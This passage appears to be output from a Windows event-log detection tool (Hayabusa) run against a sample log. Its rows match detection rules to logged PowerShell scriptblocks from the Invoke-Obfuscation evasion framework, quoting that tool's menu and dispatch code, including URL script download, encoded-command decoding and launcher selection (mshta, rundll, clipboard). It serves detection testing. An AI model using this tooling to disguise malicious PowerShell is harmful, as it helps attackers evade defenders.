Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' -NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' -NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
